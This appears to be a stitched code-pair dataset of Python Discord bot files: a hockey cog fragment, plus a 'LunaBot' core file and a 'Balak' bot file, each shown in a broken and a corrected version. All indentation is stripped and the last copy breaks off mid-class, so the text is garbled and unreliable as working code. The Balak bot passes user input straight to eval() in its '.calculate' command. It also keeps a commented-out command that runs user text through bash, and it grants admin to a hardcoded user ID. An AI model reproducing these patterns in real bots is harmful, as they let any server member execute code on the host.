logo.seek(0)
image = discord.File(logo, filename="eastern_logo.png")
await ctx.send(msg1, file=image)
for division in team_list:
if division == "Central":
async with self.session.get(western_conference) as resp:
data = await resp.read()
logo = BytesIO()
logo.write(data)
logo.seek(0)
image = discord.File(logo, filename="western_logo.png")
await ctx.send(file=image)
div_emoji = "<:" + TEAMS["Team {}".format(division)]["emoji"] + ">"
msg = "{0} __**{1} DIVISION**__ {0}".format(div_emoji, division.upper())
await ctx.send(msg)
for team in team_list[division]:
team_emoji = "<:" + TEAMS[team]["emoji"] + ">"
team_link = TEAMS[team]["invite"]
msg = "{0} {1} {0}".format(team_emoji, team_link)
await ctx.send(msg)
@hockey_commands.command()
@checks.is_owner()
async def getgoals(self, ctx):
"""
Testing function with testgame.json
"""
to_remove = []
games_playing = True
# log.debug(link)
with open("/mnt/e/github/Trusty-cogs/hockey/testgame.json", "r") as infile:
data = json.loads(infile.read())
# log.debug(data)
game = await Game.from_json(data)
await game.check_game_state(self.bot)
if (game.home_score + game.away_score) != 0:
await game.check_team_goals(self.bot)
all_teams = await self.config.teams()
for team in await self.config.teams():
if team["team_name"] in [game.home_team, game.away_team]:
all_teams.remove(team)
team["goal_id"] = {}
team["game_state"] = "Null"
team["game_start"] = ""
team["period"] = 0
all_teams.append(team)
await self.config.teams.set(all_teams)
await ctx.send("Done testing.")
@hockeyset_commands.command(hidden=True)
@checks.is_owner()
async def pickems_tally(self, ctx):
"""
Manually tally the leaderboard
"""
await Pickems.tally_leaderboard(self.bot)
await ctx.send(_("Leaderboard tallying complete."))
@hockeyset_commands.command(hidden=True)
@checks.is_owner()
async def check_pickem_winner(self, ctx, days: int = 1):
"""
Manually check all pickems objects for winners
`days` number of days to look back
"""
days = days + 1
now = datetime.now()
for i in range(1, days):
delta = timedelta(days=-i)
check_day = now + delta
games = await Game.get_games(None, check_day, check_day)
for game in games:
await Pickems.set_guild_pickem_winner(self.bot, game)
await ctx.send(_("Pickems winners set."))
@gdc.command(hidden=True, name="test")
@checks.is_owner()
async def test_gdc(self, ctx):
"""
Test checking for new game day channels
"""
await GameDayChannels.check_new_gdc(self.bot)
@hockeyset_commands.command()
@checks.is_owner()
async def teststandings(self, ctx):
"""
Test the automatic standings function/manually update standings
"""
try:
await Standings.post_automatic_standings(self.bot)
except Exception as e:
log.debug("error testing standings page", exc_info=True)
@hockeyset_commands.command()
@checks.is_owner()
async def cogstats(self, ctx):
"""
Display current number of servers and channels
the cog is storing in console
"""
all_channels = await self.config.all_channels()
all_guilds = await self.config.all_guilds()
guild_list = {}
for channels in all_channels.keys():
channel = self.bot.get_channel(channels)
if channel is None:
log.debug(channels)
continue
if channel.guild.name not in guild_list:
guild_list[channel.guild.name] = 1
else:
guild_list[channel.guild.name] += 1
msg = "Servers:{}\nNumber of Channels: {}\nNumber of Servers: {}".format(
guild_list, len(all_channels), len(all_guilds)
)
log.debug(msg)
#######################################################################
# Owner Only Commands Mostly for Testing
@hockeyset_commands.command()
@checks.is_owner()
async def customemoji(self, ctx):
"""
Set custom emojis for the bot to use
Requires you to upload a .yaml file with
emojis that the bot can see
an example may be found [here](https://github.com/TrustyJAID/Trusty-cogs/blob/V3/hockey/emoji.yaml)
if no emoji is provided for a team the Other
slot will be filled instead
It's recommended to have an emoji for every team
to utilize all features of the cog such as pickems
"""
attachments = ctx.message.attachments
if attachments == []:
await ctx.send(_("Upload the .yaml file to use. Type `exit` to cancel."))
msg = await self.wait_for_file(ctx)
if msg is None:
return
try:
await self.change_custom_emojis(msg.attachments)
except InvalidFileError:
await ctx.send(_("That file doesn't seem to be formatted correctly."))
return
else:
try:
await self.change_custom_emojis(attachments)
except InvalidFileError:
await ctx.send(_("That file doesn't seem to be formatted correctly."))
return
new_msg = "".join(("<:" + TEAMS[e]["emoji"] + ">") for e in TEAMS)
await ctx.send(_("New emojis set to: ") + new_msg)
await ctx.send("You should reload the cog for everything to work correctly.")
@hockeyset_commands.command()
@checks.is_owner()
async def resetgames(self, ctx):
"""
Resets the bots game data incase something goes wrong
"""
all_teams = await self.config.teams()
for team in await self.config.teams():
all_teams.remove(team)
team["goal_id"] = {}
team["game_state"] = "Null"
team["game_start"] = ""
team["period"] = 0
all_teams.append(team)
await self.config.teams.set(all_teams)
await ctx.send(_("Saved game data reset."))
@gdc.command()
@checks.is_owner()
async def setcreated(self, ctx, created: bool):
"""
Sets whether or not the game day channels have been created
"""
await self.config.created_gdc.set(created)
await ctx.send(_("created_gdc set to ") + str(created))
@gdc.command()
@checks.is_owner()
async def cleargdc(self, ctx):
"""
Checks for manually deleted channels from the GDC channel list
and removes them
"""
guild = ctx.message.guild
good_channels = []
for channels in await self.config.guild(guild).gdc():
channel = self.bot.get_channel(channels)
if channel is None:
await self.config._clear_scope(Config.CHANNEL, str(channels))
log.info("Removed the following channels" + str(channels))
continue
else:
good_channels.append(channel.id)
await self.config.guild(guild).gdc.set(good_channels)
@hockeyset_commands.command()
@checks.is_owner()
async def clear_broken_channels(self, ctx):
"""
Removes missing channels from the config
"""
for channels in await self.config.all_channels():
channel = self.bot.get_channel(channels)
if channel is None:
await self.config._clear_scope(Config.CHANNEL, str(channels))
log.info("Removed the following channels" + str(channels))
continue
# if await self.config.channel(channel).to_delete():
# await self.config._clear_scope(Config.CHANNEL, str(channels))
await ctx.send(_("Broken channels removed"))
@hockeyset_commands.command()
@checks.is_owner()
async def remove_broken_guild(self, ctx):
"""
Removes a server that no longer exists on the bot
"""
all_guilds = await self.config.all_guilds()
for guilds in await self.config.all_guilds():
guild = self.bot.get_guild(guilds)
if guild is None:
await self.config._clear_scope(Config.GUILD, str(guilds))
else:
if not await self.config.guild(guild).create_channels():
await self.config.guild(guild).gdc.set([])
await ctx.send(_("Saved servers the bot is no longer on have been removed."))
@hockeyset_commands.command()
@checks.is_owner()
async def clear_weekly(self, ctx):
"""
Clears the weekly tracker on the current servers pickems
May not be necessary anymore
"""
leaderboard = await self.config.guild(ctx.guild).leaderboard()
if leaderboard is None:
leaderboard = {}
for user in leaderboard:
leaderboard[str(user)]["weekly"] = 0
await self.config.guild(ctx.guild).leaderboard.set(leaderboard)
@hockey_commands.command(hidden=True)
@checks.is_owner()
async def lights(self, ctx):
"""
Tests the philips Hue light integration
This is hard coded at the moment with no plans to make work generally
this will be safely ignored.
"""
if not LIGHTS_SET:
hue = Oilers(self.bot)
await hue.goal_lights()
else:
return
@hockeyset_commands.command()
@checks.is_owner()
async def testloop(self, ctx):
"""
Toggle the test game loop
"""
if not self.TEST_LOOP:
self.TEST_LOOP = True
else:
self.TEST_LOOP = False
await ctx.send(_("Test loop set to ") + str(self.TEST_LOOP))
@hockeyset_commands.command()
@checks.is_owner()
async def rempickem(self, ctx):
"""
Clears the servers current pickems object list
"""
await self.config.guild(ctx.guild).pickems.set([])
await ctx.send(_("All pickems removed on this server."))
@hockeyset_commands.command()
@checks.is_owner()
async def remleaderboard(self, ctx):
"""
Clears the servers pickems leaderboard
"""
await self.config.guild(ctx.guild).leaderboard.set({})
await ctx.send(_("Server leaderboard reset."))
def __unload(self):
self.bot.loop.create_task(self.session.close())
if getattr(self, "loop", None) is not None:
self.loop.cancel()
__del__ = __unload
|
import discord, asyncio
import logging, traceback
import platform
import time
import sys
from discord.ext import commands
from utils import presence,settings
log = logging.getLogger("bot.core")
class LunaBot(commands.AutoShardedBot):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.uptime = 0
self.add_command(self.__reload__)
modules = [
"cogs.general",
"cogs.pug"
]
for m in modules:
try: self.load_extension(m)
except: log.error(f"Failed to load {m}:\n{traceback.format_exc()}")
else: log.debug(f"Loaded {m}")
log.info(f"Loaded {len(modules)} modules")
async def on_ready(self):
await presence.change_presence(self)
print(f"discord.py version: {discord.__version__}")
print(f"Python version: {platform.python_version()}")
print(f"Running on: {platform.system()} v{platform.version()}")
print(f"Discord user: {self.user} / {self.user.id}")
print(f"Connected guilds: {len(self.guilds)}")
print(f"Connected users: {len(list(self.get_all_members()))}")
print(f"Shard IDs: {getattr(self, "shard_ids", None)}")
self.uptime = time.time()
async def on_command(self, ctx):
if ctx.author.bot:
return
commands.Cooldown(1, 5, commands.BucketType.user).update_rate_limit()
async def on_command_error(self, ctx, error):
if isinstance(error, commands.NoPrivateMessage):
await ctx.send(ctx.message.author, 'This command cannot be used in private messages.')
elif isinstance(error, commands.DisabledCommand):
await ctx.send(ctx.message.author, 'Sorry. This command is disabled and cannot be used.')
elif isinstance(error, commands.CommandInvokeError):
print('In {0.command.qualified_name}:'.format(ctx), file=sys.stderr)
traceback.print_tb(error.original.__traceback__)
print('{0.__class__.__name__}: {0}'.format(error.original), file=sys.stderr)
# -- Unhandled exceptions -- #
logging.fatal(f"{type(error).__name__}")
@commands.command(hidden=True, name="reload")
async def __reload__(ctx, cog):
if not ctx.author.id in settings.BotOwners: return
try:
ctx.bot.unload_extension(cog)
ctx.bot.load_extension(cog)
except Exception as e:
await ctx.send(f"Failed to reload cog: `{type(e).__name__}: {e}`")
else:
await ctx.send(f"Load Success")
def run(bot):
try:
if settings.UseBetaBot:
bot.run(settings.BetaToken, bot=True, reconnect=True)
else:
bot.run(settings.Token, bot=True, reconnect=True)
except KeyboardInterrupt:
bot.loop.run_until_complete(bot.logout())
except:
log.fatal(traceback.format_exc()) | import discord, asyncio
import logging, traceback
import platform
import time
import sys
from discord.ext import commands
from utils import presence,settings
log = logging.getLogger("bot.core")
class LunaBot(commands.AutoShardedBot):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.uptime = 0
self.add_command(self.__reload__)
modules = [
"cogs.general",
"cogs.pug"
]
for m in modules:
try: self.load_extension(m)
except: log.error(f"Failed to load {m}:\n{traceback.format_exc()}")
else: log.debug(f"Loaded {m}")
log.info(f"Loaded {len(modules)} modules")
async def on_ready(self):
await presence.change_presence(self)
print(f"discord.py version: {discord.__version__}")
print(f"Python version: {platform.python_version()}")
print(f"Running on: {platform.system()} v{platform.version()}")
print(f"Discord user: {self.user} / {self.user.id}")
print(f"Connected guilds: {len(self.guilds)}")
print(f"Connected users: {len(list(self.get_all_members()))}")
print(f"Shard IDs: {getattr(self, 'shard_ids', None)}")
self.uptime = time.time()
async def on_command(self, ctx):
if ctx.author.bot:
return
commands.Cooldown(1, 5, commands.BucketType.user).update_rate_limit()
async def on_command_error(self, ctx, error):
if isinstance(error, commands.NoPrivateMessage):
await ctx.send(ctx.message.author, 'This command cannot be used in private messages.')
elif isinstance(error, commands.DisabledCommand):
await ctx.send(ctx.message.author, 'Sorry. This command is disabled and cannot be used.')
elif isinstance(error, commands.CommandInvokeError):
print('In {0.command.qualified_name}:'.format(ctx), file=sys.stderr)
traceback.print_tb(error.original.__traceback__)
print('{0.__class__.__name__}: {0}'.format(error.original), file=sys.stderr)
# -- Unhandled exceptions -- #
logging.fatal(f"{type(error).__name__}")
@commands.command(hidden=True, name="reload")
async def __reload__(ctx, cog):
if not ctx.author.id in settings.BotOwners: return
try:
ctx.bot.unload_extension(cog)
ctx.bot.load_extension(cog)
except Exception as e:
await ctx.send(f"Failed to reload cog: `{type(e).__name__}: {e}`")
else:
await ctx.send(f"Load Success")
def run(bot):
try:
if settings.UseBetaBot:
bot.run(settings.BetaToken, bot=True, reconnect=True)
else:
bot.run(settings.Token, bot=True, reconnect=True)
except KeyboardInterrupt:
bot.loop.run_until_complete(bot.logout())
except:
log.fatal(traceback.format_exc()) |
import json
import os
from typing import Callable, Union
import discord
from discord.embeds import Embed
from discord.ext.commands.core import command
from discord.ext.commands.errors import MissingAnyRole, MissingPermissions, MissingRole
import pyowm
import pyowm.weatherapi25.observation
import ai_m2
import random
from discord.ext import commands
from settings_manager import SettingsManager
from pyowm import OWM
from math import *
from dotenv import load_dotenv
from youtube import search as searchy, subprocess as sb
load_dotenv()
TOKEN=os.getenv("TOKEN")
bot = commands.Bot(command_prefix='b')
r=random.random
#DB=int(os.getenv("DBID"))
key=os.getenv("KEY")
owm=OWM(key)
owm=owm.weather_manager()
sm = SettingsManager()
def get_bool(s: str) -> bool:
if s.lower() in ["t", "true", "yes", "y", "enable", "on"]:
return True
return False
def tes(f: Callable) -> Callable:
print(f, f.name)
return f
def get_role(guild, name):
tc = discord.utils.find(lambda g: g.name==name, guild.roles)
return tc
def get_channel(guild, id):
tc = discord.utils.find(lambda g: g.id==id, guild.channels)
return tc
async def error(ctx, error):
print(error)
em=Embed(title="Error!", description='*The following error has occured* **'+repr(error).replace('*','\\*')+'**', url="https://discord.gg/VXFsKzf", color=0xff0000)
if not (isinstance(error, commands.ArgumentParsingError) or isinstance(error, commands.MissingRequiredArgument) or isinstance(error, MissingRole) or isinstance(error, MissingAnyRole) or isinstance(error, MissingPermissions)):
em.set_footer(text="**Please report this to the dev**\nClick on the title to get the report server invite")
await ctx.send(embed=em)
@bot.command(name='.',help='talk to velcem', )
async def on_message(ctx: commands.Context, *messages):
async with ctx.typing():
message=" ".join(messages)
print(message)
await ctx.send(ai_m2.reply(message))
@bot.command(name='.roll_dice', help='Simulates rolling dice.', )
async def roll(ctx, number_of_dice: int, number_of_sides: int):
await ctx.trigger_typing()
dice = [
str(random.choice(range(1, number_of_sides + 1)))
for _ in range(number_of_dice)
]
await ctx.send(', '.join(dice))
@bot.command(name='.calculate', help='Does simple math stuff')
async def calc(ctx, string: str):
await ctx.trigger_typing()
await ctx.send(str(eval(string)))
@bot.command(name='.create-channel')
async def create_channel(ctx, channel_name='!stonks_chennel'):
auth_roles = [x.name for x in ctx.author.roles]
print("Coder" in auth_roles,auth_roles)
if not ("Edminh" in auth_roles or "Programmer" in auth_roles):
return
guild = ctx.guild
print(ctx.command,ctx.command.__dict__)
existing_channel = discord.utils.get(guild.channels, name=channel_name)
if not existing_channel:
print(f'Creating a new channel: {channel_name}')
catg = discord.utils.get(guild.categories, name="chat")
await guild.create_text_channel(channel_name,category=catg)
@bot.command(name=".info",help="get server and user info")
async def info(ctx: commands.Context):
await ctx.trigger_typing()
ret = f"Guild id:- {ctx.guild.id}\nMembers:\n- "
ret += "- ".join([f"{member.name} {member.status}" for member in ctx.guild.members])
await ctx.send(ret)
@bot.command(name=".weather")
async def weather(ctx,city: str):
await ctx.send(
embed=Embed(
title="This command is under testing",
description="due to the recent updates to the Open Weather api, the bot's weather api is broken, but still a new api is under work",
color=0x0000ff
)
)
async with ctx.typing():
obs: pyowm.weatherapi25.observation.Observation=owm.weather_at_place(city)
print(obs)
await ctx.send(repr(obs))
ret: pyowm.weatherapi25.observation.weather.Weather = obs.weather
print(ret)
await ctx.send(f'the weather conditions will most likely be {ret['detailed_status']},\nTemperature will remain around {ret['temperature']['temp']-273.15}\u00b0C, Humidity {ret['humidity']}%. Winds will blow at {ret['wind']['speed']*3.6} kph at {ret['wind']['deg']}\u00b0 from North')
@bot.command(name="connect")
async def connect(ctx, chan: discord.VoiceChannel):
vc=ctx.voice_client
if vc:
await vc.move_to(chan)
else:
await chan.connect()
vc=ctx.voice_client
vc.play(discord.FFmpegPCMAudio('text.mp3'), after=(lambda e: print(f"Finished playing: {e}")))
# Lets set the volume to 1
vc.source = discord.PCMVolumeTransformer(vc.source)
vc.source.volume = 1
@bot.command()
async def search(ctx, query: str):
async with ctx.typing():
await ctx.send("searching...")
await ctx.send(repr(await searchy(ctx, query)))
@bot.command()
async def play(ctx, chan: discord.VoiceChannel, query: str, key: str=""):
await search(ctx, query, key)
await connect(ctx, chan)
@bot.command()
async def repeat(ctx: commands.Context, message: str, number: int=1):
if ctx.author.id != 303140523038998529 and number>=10:
await ctx.trigger_typing()
await ctx.send("Sorry but you dont have permissions to get more than 10 repeats")
return
async with ctx.typing():
for i in range(number):
await ctx.send(message)
@bot.command()
async def make_me_admin(ctx):
await ctx.trigger_typing()
print(ctx)
if ctx.author.id == 303140523038998529:
await ctx.author.add_roles(role:=get_role(ctx.guild,"Admin"))
print(role)
else:
await ctx.send("No. Imma lazy and don't want to")
@bot.command()
async def what_are_my_roles(ctx):
await ctx.trigger_typing()
await ctx.send("\n".join([x.name.lstrip("@") for x in ctx.author.roles]))
@bot.command()
async def disconnect(ctx):
vc=ctx.voice_client
await vc.disconnect()
#@bot.command()
#async def execute(ctx, *command):
# async with ctx.typing():
# auth_roles = [x.name for x in ctx.author.roles]
# print("Coder" in auth_roles,auth_roles)
# if not ("Edminh" in auth_roles or "Programmer" in auth_roles):
# return
# res = sb.Popen(["bash","-c",f"{" ".join(command)}"], stdout=sb.PIPE)
# while res.poll() is None:
# pass
# await ctx.send(res.stdout.read().decode())
@bot.command()
async def alak(ctx):
await ctx.trigger_typing()
await ctx.send("Han! balak."+ctx.author.mention)
@bot.command()
async def clear(ctx, amount=2.0):
await ctx.trigger_typing()
negflag, embed = False, None
if amount < 0:
embed = discord.Embed(title="Negative", description=f"your given value was negative, so I took the absolute value **{-amount}**", color=0xcc0000)
amount = -amount
negflag = True
amount = round(amount)
if amount > 100:
embed = discord.Embed(title="Overflow", description=f"Amount too large **{-amount}**\nNot allowed", color=0xcc0000)
await ctx.send(emed=embed)
await ctx.channel.purge(limit=amount)
if negflag:
await ctx.send(embed=embed)
await ctx.send(f"**__{amount}__** messages were deleted")
@bot.command(name=".kick")
async def perms(ctx: commands.Context, user: discord.Member, reason: str):
await ctx.trigger_typing()
user_can: discord.Permissions = ctx.author.permissions_in(ctx.channel)
if user_can.kick_members:
embed = discord.Embed(title="Kicked!", description=f"**{user.name}** was kicked by {ctx.author.mention}", color=0xcc2222)
embed.set_thumbnail(url=user.avatar_url)
embed.add_field(name="Reason", value=reason)
await ctx.send(embed=embed)
await user.kick(reason=reason)
chan: discord.DMChannel = await user.create_dm()
await chan.trigger_typing()
await chan.send(f"You kicked by __{ctx.author.mention}__ from {ctx.guild.name}\nfor {reason}")
else:
embed = discord.Embed(title="Denied!", description=f"{ctx.author.mention}, you arent allowed to kick", color=0xcc0055)
await ctx.send(embed=embed)
@bot.command(name=".settings", aliases=[".s"])
async def settings(ctx: commands.Context, *args):
print(args)
with sm as s:
for arg in args:
if "=" in arg:
key, value = arg.split("=")
if key == "system_channel":
c = int(value[value.index("#")+1:-1])
print(c)
s.set_sys_channel(ctx.guild.id, c)
await ctx.send("**Done!**")
elif key == "announcement_channel":
c = int(value[value.index("#")+1:-1])
print(c)
s.set_ann_channel(ctx.guild.id, c)
await ctx.send("**Done!**")
elif key == "greet":
s.set_greet(ctx.guild.id, get_bool(value))
await ctx.send("**Done!**")
elif key == "mute on ping":
s.set_mute_everyone(ctx.guild.id, get_bool(value))
await ctx.send("**Done!**")
else:
embed = discord.Embed(title="Error!", description=f"incorrect key!", color=0xcc0055)
await ctx.send(embed=embed)
@bot.command(".announce", aliases=[".ann"])
async def announce(ctx: commands.Context, text: str, *args):
with sm as s:
chan: Union[discord.TextChannel, None] = None
if (cha_id := s.get_ann_channel(str(ctx.guild.id))) is not None:
chan = get_channel(ctx.guild, cha_id)
else:
chan = ctx.guild.system_channel
await chan.trigger_typing()
reactor = {}
for emoji, role in map(lambda x: x.split("="), args):
reactor[emoji.strip()] = role.strip()
embed = Embed(title=f"Announcement by {ctx.author.name}", description=text, color=0x0000ff)
embed.add_field(name="Reactions", value="\n\t".join(args) or "none")
msg: discord.Message = await chan.send(embed=embed)
print(msg, reactor)
s.add_reactor_channel(str(ctx.guild.id), str(msg.id), reactor)
@bot.command(name=".report", aliases=[".r", "r"])
async def report(ctx,text: discord.Message):
await text.add_reaction("😠")
@bot.command()
async def please_unmute(ctx: commands.Context):
guild = ctx.guild
with sm as s:
cha_id = s.get_sys_channel(str(guild.id))
if cha_id is not None:
cha: discord.TextChannel = get_channel(guild, cha_id)
await cha.send(f"**Alert __Admins__**,\n {ctx.author.mention} wants to be unmuted, if his punishment is complete please unmute him")
else:
await guild.system_channel.send(f"**Alert __Admins__**,\n {ctx.author.mention} wants to be unmuted, if his punishment is complete please unmute him")
@bot.command()
async def test(ctx: commands.Context):
async for entry in ctx.guild.audit_logs(limit=100):
print(entry.__dict__)
await ctx.send("***This is a testing/ developement command, if you aren't the developers of this don't use it***")
raise BaseException("lol")
class Miscellaneous:
@bot.command(aliases=[".v"])
async def version(ctx):
await ctx.send("1.0.9")
@bot.command(aliases=["inv",".inv",".invite"])
async def invite(ctx):
em=Embed(title="Invite Balak[click here for instant invite]", description="to invite balak open the following \/ link in your browser or click the title\nhttps://top.gg/bot/749640022751182868/invite", url="https://top.gg/bot/749640022751182868/invite")
await ctx.send(embed=em)
@bot.command(aliases=[".vote"])
async def vote(ctx):
em=Embed(title="Vote Balak[click here for instant link]", description="to vote balak open the following \/ link in your browser or click the title\nhttps://top.gg/bot/749640022751182868/vote", url="https://top.gg/bot/749640022751182868/vote")
await ctx.send(embed=em)
@bot.command(aliases=[".vote"])
async def vote(ctx):
em=Embed(title="Source code of Balak[click here for instant link]", description="to view balak's source open the following \/ link in your browser or click the title\nhttps://github.com/ayushashi11/balak", url="https://github.com/ayushashi11/balak")
await ctx.send(embed=em)
bot.add_cog(Miscellaneous())
for command in bot.commands:
command.error(error)
bot.run(TOKEN)
| import json
import os
from typing import Callable, Union
import discord
from discord.embeds import Embed
from discord.ext.commands.core import command
from discord.ext.commands.errors import MissingAnyRole, MissingPermissions, MissingRole
import pyowm
import pyowm.weatherapi25.observation
import ai_m2
import random
from discord.ext import commands
from settings_manager import SettingsManager
from pyowm import OWM
from math import *
from dotenv import load_dotenv
from youtube import search as searchy, subprocess as sb
load_dotenv()
TOKEN=os.getenv("TOKEN")
bot = commands.Bot(command_prefix='b')
r=random.random
#DB=int(os.getenv("DBID"))
key=os.getenv("KEY")
owm=OWM(key)
owm=owm.weather_manager()
sm = SettingsManager()
def get_bool(s: str) -> bool:
if s.lower() in ["t", "true", "yes", "y", "enable", "on"]:
return True
return False
def tes(f: Callable) -> Callable:
print(f, f.name)
return f
def get_role(guild, name):
tc = discord.utils.find(lambda g: g.name==name, guild.roles)
return tc
def get_channel(guild, id):
tc = discord.utils.find(lambda g: g.id==id, guild.channels)
return tc
async def error(ctx, error):
print(error)
em=Embed(title="Error!", description='*The following error has occured* **'+repr(error).replace('*','\\*')+'**', url="https://discord.gg/VXFsKzf", color=0xff0000)
if not (isinstance(error, commands.ArgumentParsingError) or isinstance(error, commands.MissingRequiredArgument) or isinstance(error, MissingRole) or isinstance(error, MissingAnyRole) or isinstance(error, MissingPermissions)):
em.set_footer(text="**Please report this to the dev**\nClick on the title to get the report server invite")
await ctx.send(embed=em)
@bot.command(name='.',help='talk to velcem', )
async def on_message(ctx: commands.Context, *messages):
async with ctx.typing():
message=" ".join(messages)
print(message)
await ctx.send(ai_m2.reply(message))
@bot.command(name='.roll_dice', help='Simulates rolling dice.', )
async def roll(ctx, number_of_dice: int, number_of_sides: int):
await ctx.trigger_typing()
dice = [
str(random.choice(range(1, number_of_sides + 1)))
for _ in range(number_of_dice)
]
await ctx.send(', '.join(dice))
@bot.command(name='.calculate', help='Does simple math stuff')
async def calc(ctx, string: str):
await ctx.trigger_typing()
await ctx.send(str(eval(string)))
@bot.command(name='.create-channel')
async def create_channel(ctx, channel_name='!stonks_chennel'):
auth_roles = [x.name for x in ctx.author.roles]
print("Coder" in auth_roles,auth_roles)
if not ("Edminh" in auth_roles or "Programmer" in auth_roles):
return
guild = ctx.guild
print(ctx.command,ctx.command.__dict__)
existing_channel = discord.utils.get(guild.channels, name=channel_name)
if not existing_channel:
print(f'Creating a new channel: {channel_name}')
catg = discord.utils.get(guild.categories, name="chat")
await guild.create_text_channel(channel_name,category=catg)
@bot.command(name=".info",help="get server and user info")
async def info(ctx: commands.Context):
await ctx.trigger_typing()
ret = f"Guild id:- {ctx.guild.id}\nMembers:\n- "
ret += "- ".join([f"{member.name} {member.status}" for member in ctx.guild.members])
await ctx.send(ret)
@bot.command(name=".weather")
async def weather(ctx,city: str):
await ctx.send(
embed=Embed(
title="This command is under testing",
description="due to the recent updates to the Open Weather api, the bot's weather api is broken, but still a new api is under work",
color=0x0000ff
)
)
async with ctx.typing():
obs: pyowm.weatherapi25.observation.Observation=owm.weather_at_place(city)
print(obs)
await ctx.send(repr(obs))
ret: pyowm.weatherapi25.observation.weather.Weather = obs.weather
print(ret)
await ctx.send(f'the weather conditions will most likely be {ret["detailed_status"]},\nTemperature will remain around {ret["temperature"]["temp"]-273.15}\u00b0C, Humidity {ret["humidity"]}%. Winds will blow at {ret["wind"]["speed"]*3.6} kph at {ret["wind"]["deg"]}\u00b0 from North')
@bot.command(name="connect")
async def connect(ctx, chan: discord.VoiceChannel):
vc=ctx.voice_client
if vc:
await vc.move_to(chan)
else:
await chan.connect()
vc=ctx.voice_client
vc.play(discord.FFmpegPCMAudio('text.mp3'), after=(lambda e: print(f"Finished playing: {e}")))
# Lets set the volume to 1
vc.source = discord.PCMVolumeTransformer(vc.source)
vc.source.volume = 1
@bot.command()
async def search(ctx, query: str):
async with ctx.typing():
await ctx.send("searching...")
await ctx.send(repr(await searchy(ctx, query)))
@bot.command()
async def play(ctx, chan: discord.VoiceChannel, query: str, key: str=""):
await search(ctx, query, key)
await connect(ctx, chan)
@bot.command()
async def repeat(ctx: commands.Context, message: str, number: int=1):
if ctx.author.id != 303140523038998529 and number>=10:
await ctx.trigger_typing()
await ctx.send("Sorry but you dont have permissions to get more than 10 repeats")
return
async with ctx.typing():
for i in range(number):
await ctx.send(message)
@bot.command()
async def make_me_admin(ctx):
await ctx.trigger_typing()
print(ctx)
if ctx.author.id == 303140523038998529:
await ctx.author.add_roles(role:=get_role(ctx.guild,"Admin"))
print(role)
else:
await ctx.send("No. Imma lazy and don't want to")
@bot.command()
async def what_are_my_roles(ctx):
await ctx.trigger_typing()
await ctx.send("\n".join([x.name.lstrip("@") for x in ctx.author.roles]))
@bot.command()
async def disconnect(ctx):
vc=ctx.voice_client
await vc.disconnect()
#@bot.command()
#async def execute(ctx, *command):
# async with ctx.typing():
# auth_roles = [x.name for x in ctx.author.roles]
# print("Coder" in auth_roles,auth_roles)
# if not ("Edminh" in auth_roles or "Programmer" in auth_roles):
# return
# res = sb.Popen(["bash","-c",f"{' '.join(command)}"], stdout=sb.PIPE)
# while res.poll() is None:
# pass
# await ctx.send(res.stdout.read().decode())
@bot.command()
async def alak(ctx):
await ctx.trigger_typing()
await ctx.send("Han! balak."+ctx.author.mention)
@bot.command()
async def clear(ctx, amount=2.0):
await ctx.trigger_typing()
negflag, embed = False, None
if amount < 0:
embed = discord.Embed(title="Negative", description=f"your given value was negative, so I took the absolute value **{-amount}**", color=0xcc0000)
amount = -amount
negflag = True
amount = round(amount)
if amount > 100:
embed = discord.Embed(title="Overflow", description=f"Amount too large **{-amount}**\nNot allowed", color=0xcc0000)
await ctx.send(emed=embed)
await ctx.channel.purge(limit=amount)
if negflag:
await ctx.send(embed=embed)
await ctx.send(f"**__{amount}__** messages were deleted")
@bot.command(name=".kick")
async def perms(ctx: commands.Context, user: discord.Member, reason: str):
await ctx.trigger_typing()
user_can: discord.Permissions = ctx.author.permissions_in(ctx.channel)
if user_can.kick_members:
embed = discord.Embed(title="Kicked!", description=f"**{user.name}** was kicked by {ctx.author.mention}", color=0xcc2222)
embed.set_thumbnail(url=user.avatar_url)
embed.add_field(name="Reason", value=reason)
await ctx.send(embed=embed)
await user.kick(reason=reason)
chan: discord.DMChannel = await user.create_dm()
await chan.trigger_typing()
await chan.send(f"You kicked by __{ctx.author.mention}__ from {ctx.guild.name}\nfor {reason}")
else:
embed = discord.Embed(title="Denied!", description=f"{ctx.author.mention}, you arent allowed to kick", color=0xcc0055)
await ctx.send(embed=embed)
@bot.command(name=".settings", aliases=[".s"])
async def settings(ctx: commands.Context, *args):
print(args)
with sm as s:
for arg in args:
if "=" in arg:
key, value = arg.split("=")
if key == "system_channel":
c = int(value[value.index("#")+1:-1])
print(c)
s.set_sys_channel(ctx.guild.id, c)
await ctx.send("**Done!**")
elif key == "announcement_channel":
c = int(value[value.index("#")+1:-1])
print(c)
s.set_ann_channel(ctx.guild.id, c)
await ctx.send("**Done!**")
elif key == "greet":
s.set_greet(ctx.guild.id, get_bool(value))
await ctx.send("**Done!**")
elif key == "mute on ping":
s.set_mute_everyone(ctx.guild.id, get_bool(value))
await ctx.send("**Done!**")
else:
embed = discord.Embed(title="Error!", description=f"incorrect key!", color=0xcc0055)
await ctx.send(embed=embed)
@bot.command(".announce", aliases=[".ann"])
async def announce(ctx: commands.Context, text: str, *args):
with sm as s:
chan: Union[discord.TextChannel, None] = None
if (cha_id := s.get_ann_channel(str(ctx.guild.id))) is not None:
chan = get_channel(ctx.guild, cha_id)
else:
chan = ctx.guild.system_channel
await chan.trigger_typing()
reactor = {}
for emoji, role in map(lambda x: x.split("="), args):
reactor[emoji.strip()] = role.strip()
embed = Embed(title=f"Announcement by {ctx.author.name}", description=text, color=0x0000ff)
embed.add_field(name="Reactions", value="\n\t".join(args) or "none")
msg: discord.Message = await chan.send(embed=embed)
print(msg, reactor)
s.add_reactor_channel(str(ctx.guild.id), str(msg.id), reactor)
@bot.command(name=".report", aliases=[".r", "r"])
async def report(ctx,text: discord.Message):
await text.add_reaction("😠")
@bot.command()
async def please_unmute(ctx: commands.Context):
guild = ctx.guild
with sm as s:
cha_id = s.get_sys_channel(str(guild.id))
if cha_id is not None:
cha: discord.TextChannel = get_channel(guild, cha_id)
await cha.send(f"**Alert __Admins__**,\n {ctx.author.mention} wants to be unmuted, if his punishment is complete please unmute him")
else:
await guild.system_channel.send(f"**Alert __Admins__**,\n {ctx.author.mention} wants to be unmuted, if his punishment is complete please unmute him")
@bot.command()
async def test(ctx: commands.Context):
async for entry in ctx.guild.audit_logs(limit=100):
print(entry.__dict__)
await ctx.send("***This is a testing/ developement command, if you aren't the developers of this don't use it***")
raise BaseException("lol")
class Miscellaneous:
